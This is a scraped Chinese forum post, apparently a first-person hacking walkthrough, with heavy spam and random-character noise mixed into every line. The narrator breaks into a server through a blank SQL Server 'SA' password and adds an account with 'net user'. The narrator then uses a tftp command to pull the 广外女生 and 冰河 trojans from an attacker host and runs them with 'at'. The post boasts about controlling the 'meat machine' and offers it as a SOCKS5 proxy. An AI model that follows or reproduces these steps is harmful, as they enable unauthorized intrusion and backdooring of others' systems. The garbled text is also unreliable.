简单入侵
简单入侵简单入侵
5k.n)M3z4f看看这主机是否是网站先,用IE打开它的IP:61。170。168。168,出现“该页无法显示”。看来这主
!q"L#i2{&i7^-j机还没WEB网页。祭起我的“X-SCAN”宝刀,全面扫描一下它的各种漏洞,我就不信他没有漏洞!
5?;W/c!G-o-Y3v2Dbbs.54master.com(玩黑必备一:眼睛长到头顶上) bbs.54master.com,t)F5~ r*W'`&s$y
X-SCAN扫描结果报告:
u.O2F.r3E网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术“端口开放:1433、3389 我是网管论坛7Q'w-A![,|9x(r J%y4N
ASP 漏洞:don't find CGI漏洞: don't find IIS漏洞don't find……,SQL:SA /NULL”
5b9K"m1K!]网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术呵呵,大局已定,大家看到了有哪些漏洞吗?什么,你不懂鸟语?哇噻,你先去补习鸟语再到我这来!我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!8^2f6J,] e5J;l$@5Y3t!h(t
对了,我们的白灵、流二位大虾精通由各种乱码加鸟语组成的火星ASP语言,听说二位不日将移民火星,
%m.b!O"e-~*}'r7N)l- 畅通网络 因为有我你趁他们还在地球快去拜师学艺啊!
#`;M8p2Z'v x再接着卖我的黄婆烂瓜……
0E:G.y/K9S(b网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术3389——我得最爱!利用远程主机打开的远程控制功能(通过3389连接)进入它的WINDOWS图形界面,bbs.54master.com5B*E1E'B!G'l)H8O
这种感觉对我等菜鸟来说可不是DOS破界面能比的哦~~
(E(t(q"~#q,G$|0R:^网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术废话少说,打开我的“WINDOW2000远程客户程序”,填IP、点“联接”~~啊?连不上!再连~~还是不行
+[.a b5|/d"y+m- 畅通网络 因为有我!55555……输入法漏洞是玩不成了。 bbs.54master.com$@.X2o"e*E'B"Y(T+U7L
一招不行再换一招!点根烟先……打开“天行网络”所制的精品软件——SQLEXEC,填上IP,用户名:我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!7O6C+D+l;V6|%F
SA,密码为空,点“连接”---“:(连接成功!”
&g;o3E(E)L- 畅通网络 因为有我进来了,谈笑间我就进来了,我真厉害~~(玩黑必备二:自夸不怕吓死人)。先看看它的C盘的文件:
;j.z(A$j6i-t'J我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!DIR C:,OK!这机子装的是WINNT,怪不得我用WIN2000的远程客户程序连不上,可是它怎么会打开
1K%{*T0`7O5O6~我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!WIN2000的远程连接用端口-3389端口呢? 我是网管论坛7P v7@.b1R5K-P2X*i
算了,越想越乱,忙我的正事吧。 我是网管论坛,x.i;f(R0R7K.a-R0~#X7z
为安全起见,让我看看它建立了哪些连接进程:“netstat -n”……哈,反馈回来的信息都是一些
.H3O/x0W8Z o我是网管论坛196开头的IP,没开TTY监听,这该不会是个局域网的服务器吧? 网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术#n8c.R5y)["?9k.y
再来看看我现在的权限有多少:“net user aaa 1234 /add”---“成功建立新用户”。呵呵,网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术'B){0{9^8G,p'U
权限还不小,能建新用户哦~~由于我机子用的是WIN98,所以没法用这新建的用户名为AAA,密码我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!7l$Z2D"N(f L2h H:G0P
为1234的帐户进行连接,这帐户对我来说根本 我是网管论坛$\/@*M)f8v8`1`!P7L
没用……
.e.Z:H4f'q4?- 畅通网络 因为有我现在,我们即将开始取得远程主机的最最最……大权限!啥?你不信?呵呵,说你菜你还不高兴,
N!e-F(o)o(q我是网管论坛听说过木马吗?听说过大名鼎鼎专玩木马的“符号”大虾吗?哦,你不知木马只知符大虾……行,我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!5O#H;A/O5m8j"z1S
赶明儿我让符大虾在你机子里也放个木马,这样你就
"j1b1Q-z&_,k*g'R我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!能深刻理解啥叫木马了~~
,b*t&z(P-e(u4W'O'J5W网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术继续攻击……我们现在就要上传个木马到远程主机。木马“广外女生”现在国内很流行,前几天也
"~#E;C Z3t我是网管论坛曾去黑网下栽了一个,它的被控端程序才90K,上传比较容易,就用它做远程主机的“后门”吧。1。
"`2P'S(k t3k4v%h!}+Y网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术打开TFTP(一个能把你的PC变成FTP服务器的小程序)——
6h*n;{-g!^-]%l$J$M-V- 畅通网络 因为有我2。把“广外女生”的被控端程序gw.exe复制到我的C盘TFTP默认文件路径下。3。在远程主机里输入
,u:N-X2v%V1mbbs.54master.com命令:"tftp -i xx.xx.xx.xx get gw.exe c:\gw.exe" 我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!6K+Q'J#X+m-`"N1p
5分钟后,GW。EXE已乖乖在躺在远程主机的C盘里了~~~
!_4A)S$u7u Q现在,得想法子运行GW。EXE:1。打入命令"net time"---远程主机反馈当前时间"09:35"。 2.打入
9H!T,Y/D1z7W+P网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术程序起动时间命令"at 09:37 c:\gw.exe"(GW在9:37运行)——出现主机反应:“建立一个新任务,- 畅通网络 因为有我 Z-V*y,@1i&r:G&i+^(}&k
ID=1”
%_)Z#H#G2[1y1u9d- 畅通网络 因为有我OK!二分钟后将运行我的“广外女生”了!
0I4J+@(H,N"p(X!F#G(Q%W8N网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术打开我的“广外”控制端程序,在主机查找栏里填上“61.170.168.160---61.171.168.170”,点网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术/G;?4d,k9`#m:X4`.Y
“查找”。扫描很慢……别急……扫完了……啊?!在这扫描的IP端里无中“奖”主机!怪事啊!
+N3G3S(L3S/C我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!是远程主机的“广外”没有运行还是我对这控制端程序的操 bbs.54master.com.f2i"j#a |#G
作错误?一定是这破“广外”本身程序不行,太烂了~~(玩黑必备三:一切都不是我的错!)。
%P.z#F9M'y0f,_我是网管论坛看来,今天我只得请出封存已久的国货精品木马——“冰河”了。我的“冰河2。2”的被控端有200网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术 I"Z&d3j&I
多K,估计上传时间会很久,但如果上传成功,它的功能可不是“广外”所能与之并论的啊!另外,网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术-I"D$A:N4r:U-@
对冰河的界面操作也不会似“广外”那嚒陌生……
)n8P5B"b8q!Nbbs.54master.com言归正传,现在开始上传“冰河”:“tftp -i xx.xx.xx.xx get G-server.exe c:\inetpub\GG.exe"
+e9}1}8L A/s(为不至于太过醒目,这次把文件传到C盘的INETPUB文件包下) bbs.54master.com T:k7}/^!k3{4J+K
缓慢上传中……让我再点根烟,趁这功夫去“黑白网络”的技术论坛逛逛去…… 我是网管论坛 C6f j2E#I!?,a/?3_ ^4b
已过25分钟了,进远程主机瞧瞧是否已下栽成功了~~OK!冰河已在那里了。接着:“net time”,
(v#f h;k"l3Ebbs.54master.com反馈信息:10:30”。“at 10:32 c:\inetpub\GG.exe”,反馈信息“运行新任务,ID=1” bbs.54master.com3\-y8Q4C,a
二分钟后,打开“冰河”控制端,加入远程主机IP,连接……成功!接着再:添加服务器端连接密码、
,{3e7_7z/o5@4g7p4D添加冰河运行自动通知发往信箱、删除“广外”、“冰河”被控端程序。
;c$u5A H:}.{……
0?4k+e(F&@7N7o&K'o&w"Ibbs.54master.com现在,这主机的一切已尽在我眼前了,真爽啊!明天,我也许会把一个SOCK5代理的服务器端程序放进
3c4?-v/H9o$[+n"?5d;Z(]我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!这主机,大家以后要是想用SOCK5代理,又懒得去漫无目标的查找的话,请找我,我会把我这个人专用-I$d1G9r:U
“肉机”贡献出来的。
|
